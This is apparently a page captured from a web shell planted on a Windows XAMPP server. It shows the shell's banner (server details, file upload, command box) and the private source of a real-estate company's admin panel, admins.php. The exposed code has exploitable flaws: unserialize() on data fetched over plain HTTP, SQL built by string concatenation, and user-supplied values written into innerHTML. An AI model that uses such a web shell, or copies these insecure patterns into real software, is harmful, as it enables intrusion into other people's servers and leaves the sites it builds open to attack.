403Webshell
Server IP : 127.0.0.1  /  Your IP : 216.73.216.48
Web Server : Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
System : Windows NT DESKTOP-3H4FHQJ 10.0 build 19045 (Windows 10) AMD64
User : win 10 ( 0)
PHP Version : 8.2.12
Disable Function : NONE
MySQL : OFF |  cURL : ON |  WGET : OFF |  Perl : OFF |  Python : OFF |  Sudo : OFF |  Pkexec : OFF
Directory :  D:/xamppkk/htdocs-khalafsons/

Upload File :
current_dir [ Writeable] document_root [ Writeable]

 

Command :


[ Back ]     

Current File : D:/xamppkk/htdocs-khalafsons/admins.php
<head>
<title>khalafsons.com</title>
<link rel="icon" type="image/jpg" href="http://khalafsons.com/kvt_con/khalaf_log.jpg" />

<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<link rel="stylesheet" type="text/css" href="main_css/admins.css" >


</head>

<?php 
session_start();
include('db_con.php'); 
include('function.php');
?>

<?php

if(isset($_SESSION['id']))
{
	$my_id = $_SESSION['id'];
    $my_cpr = $_SESSION['user_cpr'];
	
	//echo $_SESSION['id'];
//	echo"$user_email";
}
?>
<input id="my_id" style="display:none;" value="<?php echo"$my_id";?>" />
<input id="my_cpr" style="display:none;" value="<?php echo"$my_cpr";?>" />

 <?php
$user_ip = getenv('REMOTE_ADDR');
$geo = unserialize(file_get_contents("http://www.geoplugin.net/php.gp?ip=$user_ip"));
$city = $geo["geoplugin_city"];
$region = $geo["geoplugin_regionName"];
$country = $geo["geoplugin_countryName"];
/*echo"$user_ip";
echo "City: ".$city."<br>";
echo "Region: ".$region."<br>";
echo "Country: ".$country."<br>";
/*
geoplugin_request
geoplugin_status
geoplugin_credit
geoplugin_city
geoplugin_region
geoplugin_areaCode
geoplugin_dmaCode
geoplugin_countryCode
geoplugin_countryName
geoplugin_continentCode
geoplugin_latitude
geoplugin_longitude
geoplugin_regionCode
geoplugin_regionName
geoplugin_currencyCode
geoplugin_currencySymbol
geoplugin_currencySymbol_UTF8
geoplugin_currencyConverter
*/
?>

<input type="text" id="country_user" class="helping_id" style="display:none;" value="<?php echo $country;?>"> 
<input type="text" id="region_user" class="helping_id" style="display:none;" value="<?php echo $region;?>">
<input type="text" id="city_user" class="helping_id" style="display:none;" value="<?php echo $city;?>">



<body id="body">

<div class="main_home">

<div class="main_log">

<img src="kvt_con/khalaf_log.jpg" width="100%" height="100%" style="border-radius:20px;" />

</div>

<div class="main_text_title">Khalaf Sons Estate</div>


</div>

<div class="positioning_main_home"></div>

<div id="main_home_left" class="main_home_left">

<a href="index"><button class="left_home_btn" >Home</button></a>
<button onClick="show_maint_container();" class="left_home_btn">Manage Maint</button>
<button onClick="show_hr_container();" class="left_home_btn">Manage HR</button>
<a href="property"><button class="left_home_btn">Property</button></a>
<!--button onClick="show_upload_cv_div();" class="left_home_btn">Vacancies</button-->
<button onClick="show_all_memebers();" class="left_home_btn">Members</button>
<a href="jobs"><button class="left_home_btn">Jobs</button></a>
<a href="contact"><button class="left_home_btn">Contacts</button></a>
<a href=""><button class="left_home_btn">About</button></a>
<!--button onClick="show_mob_share_div();" class="left_home_btn">Share</button-->
<?php
if(isset($_SESSION['id']))
{
		$my_id = $_SESSION['id'];
	
	$get_user ="select * from khalaf_admintb where user_id_adm='$my_id' ";
	$run_get_user = mysqli_query($con,$get_user);
	$check_user = mysqli_num_rows($run_get_user);
	if($check_user >0){
?>
<a href="purchase"><button class="left_home_btn">Purchase</button></a>
<a href="extraction.php"><button class="left_home_btn">Extraction</button></a>

<?php } ?>

<a href="myaccount.php"><button class="left_home_btn">Myaccount</button></a>
<a href="log_out.php"><button class="left_home_btn">Log out</button></a>
<?php
}else{?>

<a href="log_in.php"><button class="left_home_btn">Sign in</button></a>
<?php } ?>
</div>


<!-- ////////////////////////////////////////////////Maintenance//////////////////////////////////////////////////////////////////////////////////////////// -->
<div id="maint_container" style="display:none;" >
<div id="action_btn_area" class="action_btn_area">

<button id="add_new_emp_maint" onClick="show_add_new_emp_maint_div();" class="action_btn" style="background:#4B5255;color:#fff;" >Add New Employee</button>
<button id="show_maint_activ_emp_btn" onClick="show_maint_activ_emp();" class="action_btn" >Display Active</button>

</div>

<div id="add_new_employee_div" class="add_new_employee_div" >
<div class="maint_new_work_title">Add New Employee To Maintenance</div>

<input type="text" id="employee_cpr" class="maint_new_work_code" placeholder="Employee cpr no." />
<select type="text" id="permission_status" class="maint_new_work_code" classK="maint_new_work_permission" >
<option disabled selected >Permission</option>
<option>Read only</option>
<option>Read/Write</option>
<option>Full Permission</option>

</select>
<div id="erorr_out_put" style="float:left;width:100%;height:40px;line-height:40px;color:red;"></div>
<button onClick="maint_new_work_save();" class="maint_new_work_save_btn" >Enter</button>


</div>


<div id="display_maint_employee_div" class="add_new_employee_div" style="display:none;" >

<div class="disp_employee_maint_title" >Maintenance Group</div>

<div class="emp_maint_name_label" >NAME</div>
<div class="emp_maint_permission_label" >PERMISSION</div>

<div id="display_emp_maint_output"></div>

</div>

<div id="emp_maint_remove_shell_div" onClick="cancel_remove_maint();" class="emp_maint_remove_shell_div">...</div>
<div  id="emp_maint_remove_main_div" class="emp_maint_remove_main_div" >
<!--button onClick="remove_maint_employee();" class="remove_maint_btn" style="color:green">Remove</button-->
<select id="select_action" class="select_maint_btn" style="text-align:center;" >
<option disabled selected >Select Permission</option>
<option onClick="change_maint_emp_permission();">Read only</option>
<option onClick="change_maint_emp_permission();">Read/Write</option>
<option onClick="change_maint_emp_permission();">Full Permission</option>
<option onClick="change_maint_emp_permission();">No Access</option>
<option onClick="change_maint_emp_permission();">Delete</option>
</select>
<button onClick="change_maint_emp_permission();" class="remove_maint_btn" style="color:green" >Save</button>
<button onClick="cancel_remove_maint();" class="remove_maint_btn" style="color:red" >Cancel</button>
</div>




</div>


<!-- /////////////////////////////////////////////////////////End Of Maintenance/////////////////////////////////////////////////////////////////////////////////////////////////////  -->


<?php complaint_notif(); ?>

<!-- /////////////////////////////////////////////////////////Display All Members///////////////////////////////////////////////////////////////////////////////////////////////////////////////////  -->

<div onClick="cancel_activate_user_now();" id="activate_main_shell_div" class="activate_main_shell_div">...</div>

<div id="members_div" class="members_div" >
<div class="disp_member_title" >Khalaf Sons Members</diV>
<div class="disp_member_lebal_div" >
<div class="disp_member_lebal_name" >Name</div>
<div class="disp_member_lebal" >Contact</div>
<div class="disp_member_lebal" >Cpr No.</div>
<div class="disp_member_lebal" >Date</div>
</div>

<div id="display_members_output" ></div>


<div  id="activate_main_div" class="activate_main_div" >
<input type="text" id="user_contact_activate" class="user_contact" placeholder="Enter User Contact..." />
<input type="text" id="user_cpr_activate" classk="cpr_user" class="user_contact" />
<div id="activate_new_user_output" style="float:left;width:100%;height:30px;line-height:30px;margin-top:10px;text-align:center;color:red;font-size:1em;" ></div>
<button onClick="activate_new_user();" class="deactivate_user_btn" style="color:green">Activate User</button>
<button onClick="cancel_activate_user_now();" class="deactivate_user_btn" style="color:red" >Cancel</button>
</div>

<div  id="deactivate_main_div" class="activate_main_div" >
<div class="deactivate_user_title" >Deactivate User</div>
<!--input type="text" id="user_contact_deactivate" class="user_contact" placeholder="Enter Your Contact..." /-->
<input type="text" id="user_cpr_deactivate" classk="cpr_user" class="cpr_deactivate" placeholder="Enter User Cpr no..." />
<div id="activate_new_user_output" style="float:left;width:100%;height:30px;line-height:30px;margin-top:10px;text-align:center;color:red;font-size:1em;" ></div>
<button onClick="deactivate_new_user();" class="deactivate_user_btn" style="color:green">Disable User</button>
<button onClick="cancel_activate_user_now();" class="deactivate_user_btn" style="color:red" >Cancel</button>
</div>

</div><!--end of members_div -->

<!-- //////////////////////////////////////////////////////////End of Display All Members/////////////////////////////////////////////////////////////////////////////////////////////////////////////////////  -->


<!-- ////////////////////////////////////////////////////////HR Manage/////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////   -->

<div id="hr_container" style="floatk:left;display:none;" >
<div class="action_btn_area">

<button id="add_new_emp_hr" onClick="show_add_new_emp_hr_div();" class="action_btn" style="background:#4B5255;color:#fff;" >Add New Employee</button>
<button id="show_hr_activ_emp_btn" onClick="show_hr_activ_emp();" class="action_btn" >Display Active</button>

</div>


<div id="add_hr_employee_div" class="add_new_employee_div" stylek="display:none;" >
<div class="maint_new_work_title">Add New Employee HR</div>

<input type="text" id="hr_employee_cpr" class="maint_new_work_code" placeholder="Employee cpr no." />
<select type="text" id="hr_permission_status" class="maint_new_work_code" classK="maint_new_work_permission" >
<option disabled selected >Permission</option>
<option>Read only</option>
<option>Read/Write</option>
<option>Full Permission</option>

</select>
<div id="hr_erorr_out_put" style="float:left;width:100%;height:40px;line-height:40px;color:red;"></div>
<button onClick="hr_new_work_save();" class="maint_new_work_save_btn" >Enter</button>


</div>

<div id="display_hr_employee_div" class="add_new_employee_div" style="display:none;" >

<div class="disp_employee_maint_title" >HR Group</div>

<div class="emp_maint_name_label" >NAME</div>
<div class="emp_maint_permission_label" >PERMISSION</div>

<div id="display_emp_hr_output"></div>

</div>



<div id="emp_hr_changes_shell_div" onClick="close_hr_permission_option();" class="emp_maint_remove_shell_div">...</div>
<div  id="emp_hr_option_input_div" class="emp_maint_remove_main_div" >

<select id="select_action_hr" class="select_maint_btn" style="text-align:center;" >
<option disabled selected >Select Permission</option>
<option onClick="change_maint_emp_permission();">Read only</option>
<option onClick="change_maint_emp_permission();">Write only</option>
<option onClick="change_maint_emp_permission();">Read/Write</option>
<option onClick="change_maint_emp_permission();">Full Permission</option>
<option onClick="change_maint_emp_permission();">No Access</option>
<option onClick="change_maint_emp_permission();">Delete</option>
</select>
<button onClick="save_hr_emp_permission();" class="remove_maint_btn" style="color:green" >Save</button>
<button onClick="close_hr_permission_option()();" class="remove_maint_btn" style="color:red" >Cancel</button>
</div>





</div>

<!-- //////////////////////////////////////////////////////////End of HR Manage/////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////  -->

<script>

function show_maint_container()
{
	document.getElementById('maint_container').style.display="block";
	document.getElementById('hr_container').style.display="none";
	document.getElementById('members_div').style.display="none";
}
function show_maint_activ_emp()
{
	
document.getElementById('display_maint_employee_div').style.display="block";
document.getElementById('add_new_employee_div').style.display="none";	
document.getElementById('show_maint_activ_emp_btn').style="background:#4B5255;color:#fff;";
document.getElementById('add_new_emp_maint').style="background:transparent;color:#000;";
display_maint_emp();
}

function show_add_new_emp_maint_div()
{
document.getElementById('add_new_employee_div').style.display="block";	
document.getElementById('display_maint_employee_div').style.display="none";	
document.getElementById('add_new_emp_maint').style="background:#4B5255;color:#fff;";
document.getElementById('show_maint_activ_emp_btn').style="background:transparent;color:#000;";
}

function maint_new_work_save()
{
	my_cpr = document.getElementById('my_cpr').value;
    employee_cpr =document.getElementById('employee_cpr').value;
	permission_status =document.getElementById('permission_status').value;

if(employee_cpr =="" || permission_status =="Permission"){alert('Fill all the spaces and select Permission');}else{

    xmlhttp = new XMLHttpRequest();
	xmlhttp.open("GET","khalaf_auto.php?my_cpr="+my_cpr+"&employee_cpr="+employee_cpr+"&permission_status="+permission_status+"&status=insert_new_emp_maint",false);
	xmlhttp.send(null);
	
	//user_cpr = document.getElementById('user_cpr_id').value;
	document.getElementById('erorr_out_put').innerHTML=xmlhttp.responseText;
  show_maint_activ_emp();
	
    document.getElementById('employee_cpr').value="";
	document.getElementById('permission_status').value="";
	

}
}


function display_maint_emp()
{
	my_id = document.getElementById('my_id').value;
    employee_cpr =document.getElementById('employee_cpr').value;
	permission_status =document.getElementById('permission_status').value;


    xmlhttp = new XMLHttpRequest();
	xmlhttp.open("GET","khalaf_auto.php?status=display_emp_maint",false);
	xmlhttp.send(null);
	document.getElementById('display_emp_maint_output').innerHTML =xmlhttp.responseText;
	

	//show_maint_activ_emp();

}


function show_remove_btn(srb)
{ emp_maint_id = srb
	document.getElementById('emp_maint_remove_shell_div').style.display="block";
	document.getElementById('emp_maint_remove_main_div').style.display="block";
}

function cancel_remove_maint()
{
	document.getElementById('emp_maint_remove_shell_div').style.display="none";
	document.getElementById('emp_maint_remove_main_div').style.display="none";	
}

function change_maint_emp_permission()
{ 
    maint_select_action = document.getElementById('select_action').value;
    main_emp_emp_id = emp_maint_id;
	xmlhttp = new XMLHttpRequest();
	xmlhttp.open("GET","khalaf_auto.php?main_emp_emp_id="+main_emp_emp_id+"&&maint_select_action="+maint_select_action+"&&status=change_maint_emp_permission",false);
	xmlhttp.send(null);
	document.getElementById('display_emp_maint_output').innerHTML =xmlhttp.responseText;
	show_maint_activ_emp();
	cancel_remove_maint();
	//alert(select_action);
}

function show_all_memebers()
{
	xmlhttp = new XMLHttpRequest();
	xmlhttp.open("GET","khalaf_auto.php?status=disp_all_members",false);
	xmlhttp.send(null);
	document.getElementById('display_members_output').innerHTML =xmlhttp.responseText;
	document.getElementById('members_div').style.display="block";
	
	/*document.getElementById('display_maint_employee_div').style.display="none";
    document.getElementById('add_new_employee_div').style.display="none";	
    document.getElementById('show_maint_activ_emp_btn').style="display:none;";
    document.getElementById('add_new_emp_maint').style="display:none;";	*/
	
	document.getElementById('maint_container').style.display="none";
	document.getElementById('hr_container').style.display="none";

}

function activate_user_now()
{ 
    //document.getElementById('maint_container').style.display="block";
	document.getElementById('activate_main_shell_div').style.display="block";
	document.getElementById('activate_main_div').style.display="block";
	
	
}

function cancel_activate_user_now()
{
	document.getElementById('activate_main_shell_div').style.display="none";
	document.getElementById('activate_main_div').style.display="none";
	document.getElementById('deactivate_main_div').style.display="none";
	//alert(900000);
}

function activate_new_user()
{
	user_contact_actv = document.getElementById('user_contact_activate').value;
	user_cpr_actv = document.getElementById('user_cpr_activate').value;
	
	if(user_contact_actv=="" || user_cpr_actv==""){document.getElementById('activate_new_user_output').innerHTML="Fill All The Spaces";}else{
	
	xmlhttp = new XMLHttpRequest();
	xmlhttp.open("GET","khalaf_auto.php?user_contact_actv="+user_contact_actv+"&&user_cpr_actv="+user_cpr_actv+"&&status=activate_new_user",false);
	xmlhttp.send(null);
	document.getElementById('activate_new_user_output').innerHTML =xmlhttp.responseText;

	document.getElementById('user_contact_activate').value="";
	document.getElementById('user_cpr_activate').value="";
	show_all_memebers();
	cancel_activate_user_now();
	
} }

function deactivate_user_now()
{   //document.getElementById('maint_container').style.display="block";
	document.getElementById('activate_main_shell_div').style.display="block";
	document.getElementById('deactivate_main_div').style.display="block";
	//alert(900000);
}

/*function cancel_deactivate_user_now()
{
	document.getElementById('activate_main_shell_div').style.display="none";
	document.getElementById('deactivate_main_div').style.display="none";
	//alert(900000);
}*/

function deactivate_new_user()
{
	//user_contact_deactv = document.getElementById('user_contact_deactivate').value;
	user_cpr_deactv = document.getElementById('user_cpr_deactivate').value;
	xmlhttp = new XMLHttpRequest();
	xmlhttp.open("GET","khalaf_auto.php?user_cpr_deactv="+user_cpr_deactv+"&&status=deactivate_user_now",false);
	xmlhttp.send(null);
	document.getElementById('activate_new_user_output').innerHTML =xmlhttp.responseText;
	///alert(100000);
	//document.getElementById('user_contact_deactivate').value="";
	document.getElementById('user_cpr_deactivate').value="";
	show_all_memebers();
	cancel_activate_user_now()
}


function show_hr_container()
{
	
	document.getElementById('hr_container').style.display="block";
	document.getElementById('maint_container').style.display="none";
	document.getElementById('members_div').style.display="none";
}
function show_add_new_emp_hr_div()
{
	document.getElementById('add_hr_employee_div').style.display="block";
	document.getElementById('display_hr_employee_div').style.display="none";
	//alert(1234);
}

function show_hr_activ_emp()
{
	document.getElementById('display_hr_employee_div').style.display="block";
	document.getElementById('add_hr_employee_div').style.display="none";
	//alert(1234);
}
function hr_new_work_save()
{
	my_cpr = document.getElementById('my_cpr').value;
    hr_employee_cpr =document.getElementById('hr_employee_cpr').value;
	hr_permission_status =document.getElementById('hr_permission_status').value;

if(hr_employee_cpr =="" || hr_permission_status =="Permission"){alert('Fill all the spaces and select Permission');}else{

    xmlhttp = new XMLHttpRequest();
	xmlhttp.open("GET","khalaf_auto.php?my_cpr="+my_cpr+"&hr_employee_cpr="+hr_employee_cpr+"&hr_permission_status="+hr_permission_status+"&status=insert_new_emp_hr",false);
	xmlhttp.send(null);
	
	//user_cpr = document.getElementById('user_cpr_id').value;
	document.getElementById('hr_erorr_out_put').innerHTML=xmlhttp.responseText;
  //show_maint_activ_emp();
	
    document.getElementById('hr_employee_cpr').value="";
	document.getElementById('hr_permission_status').value="";
	display_hr_emp();
	show_hr_activ_emp();
}

}

display_hr_emp();
function display_hr_emp()
{
	//my_cpr = document.getElementById('my_cpr').value;
    employee_cpr =document.getElementById('employee_cpr').value;
	permission_status =document.getElementById('permission_status').value;


    xmlhttp = new XMLHttpRequest();
	xmlhttp.open("GET","khalaf_auto.php?status=display_emp_hr",false);
	xmlhttp.send(null);
	document.getElementById('display_emp_hr_output').innerHTML =xmlhttp.responseText;

}

function show_hr_permission_option(chpo)
{
	hr_emp_id = chpo;
	document.getElementById('emp_hr_changes_shell_div').style.display="block";
	document.getElementById('emp_hr_option_input_div').style.display="block";
	//alert(chpo);
}


function close_hr_permission_option()
{
	document.getElementById('emp_hr_changes_shell_div').style.display="none";
	document.getElementById('emp_hr_option_input_div').style.display="none";

}

function save_hr_emp_permission()
{ 
    my_cpr = document.getElementById('my_cpr').value;
    hr_select_action = document.getElementById('select_action_hr').value;
   
	xmlhttp = new XMLHttpRequest();
	xmlhttp.open("GET","khalaf_auto.php?my_cpr="+my_cpr+"&&hr_emp_id="+hr_emp_id+"&&hr_select_action="+hr_select_action+"&&status=save_hr_emp_permission",false);
	xmlhttp.send(null);
	document.getElementById('display_emp_maint_output').innerHTML =xmlhttp.responseText;
	display_hr_emp();
	close_hr_permission_option();
	//alert(select_action);
}




</script>




<div style="float:left;width:100%;height:50px;background:black;color:white;margin-top:20px;text-align:center;font-size:1.2em;display:none;">@Khalaf Sons Real Estate 2020.</div>



</body>

</html>

Youez - 2016 - github.com/yon3zu
LinuXploit